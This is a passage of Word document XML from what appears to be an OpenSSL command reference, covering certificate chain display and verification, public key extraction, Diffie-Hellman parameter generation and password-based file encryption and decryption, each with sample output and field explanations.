    <w:p w14:paraId="7AF05B04"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END CERTIFICATE-----</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E0AD4C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53653EC2" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-showcerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Displays full certificate chain with all certificates</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2585F2" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Certificate chain</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Shows hierarchy from server cert to root CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30907D37" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>s: (subject)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Who the certificate identifies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32207AD4" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>i: (issuer)</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Who signed/issued the certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2314D44F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>BEGIN/END CERTIFICATE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Full PEM-encoded certificate data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7121A480" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Each certificate should be signed by the next in chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32B0BF7B" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Root CA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Final certificate in chain (self-signed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AEAAA0" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Intermediate CAs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Certificates between server cert and root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D486E7" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Trust verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Client validates each certificate in the chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48483066" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Examine complete certificate chain for validation issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147582CA" w14:textId="085FD644" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Verify certificate against CA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2728AA"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verify -CAfile ca-bundle.crt certificate.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2850052F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E3A6A1"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lastRenderedPageBreak/>
        <w:t>certificate.crt: OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="587C3E10" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3165C1E8" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-CAfile</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Specifies trusted CA certificate bundle file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CCAFCF" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>certificate.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Certificate file to verify</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72815976" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>OK</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Certificate verification successful</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6751E5B9" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ca-bundle.crt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: File containing trusted root and intermediate CAs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE6CCBD" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Chain verification</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Checks complete certificate chain to trusted root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70494307" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Signature validation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Verifies certificate signatures are valid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459D519D" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Expiration check</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Ensures certificate is within validity period</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F50C76E" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Revocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Does not check CRL/OCSP unless specified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18FFA72C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Error output</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Failed verification shows specific failure reasons</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22BCFF27" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Exit code</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Returns 0 for success, non-zero for failure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47954F89" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Validate certificate against trusted CA bundle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461928D7" w14:textId="0655692B" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Extract public key from certificate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40936D"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x509 -pubkey -noout -in certificate.crt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E6495D7" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Get public key for verification or encryption.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D51966" w14:textId="3F213787" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Generate Diffie-Hellman parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="713C0BAF"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dhparam -out dhparam.pem 2048</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27992A2B" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Create DH parameters for perfect forward secrecy.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39F3752F" w14:textId="15B05CC2" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Encrypt file with password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE36371"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enc -aes-256-cbc -salt -in file.txt -out file.enc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D6AB7F2" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="321FAD36"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enter aes-256-cbc encryption password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0444B27C"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Verifying - enter aes-256-cbc encryption password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7FE58F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779686B9" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>enc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: OpenSSL encryption/decryption command</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BB5700" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-aes-256-cbc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: AES encryption with 256-bit key in CBC mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02057525" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-salt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Adds random salt to strengthen password-based encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266BAD43" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-in file.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Input file to encrypt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE2AC40" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-out file.enc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Encrypted output file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F6D39E" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password prompts</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Asks for password twice for verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45210900" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>No visible output</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Successful encryption completes silently</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F630C1C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Binary output</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: file.enc contains encrypted binary data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D4501C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>CBC mode</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Cipher Block Chaining mode for block encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D121605" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Salt protection</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Prevents rainbow table attacks on passwords</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E37B1C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Use Case:</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t xml:space="preserve"> Secure file encryption with password protection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F6AAFB" w14:textId="03281C82" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:t>Decrypt encrypted file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100A0F71"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enc -aes-256-cbc -d -in file.enc -out file.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFF14A0" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sample Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C72F45"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enter aes-256-cbc decryption password:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="446D2855" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AB11C8C" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-d flag</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Decrypt mode (instead of default encrypt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0EE44" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Same algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Must use same encryption algorithm (aes-256-cbc)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23E18484" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-in file.enc</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Encrypted input file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA57F51" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-out file.txt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Decrypted output file (original content restored)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71120537" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Password prompt</w:t>
      </w:r>
      <w:r w:rsidRPr="00A6436C">
        <w:t>: Must enter same password used for encryption</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B5EF10F" w14:textId="77777777" w:rsidR="00A6436C" w:rsidRPr="00A6436C" w:rsidRDefault="00A6436C" w:rsidP="00A6436C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="218"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00A6436C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
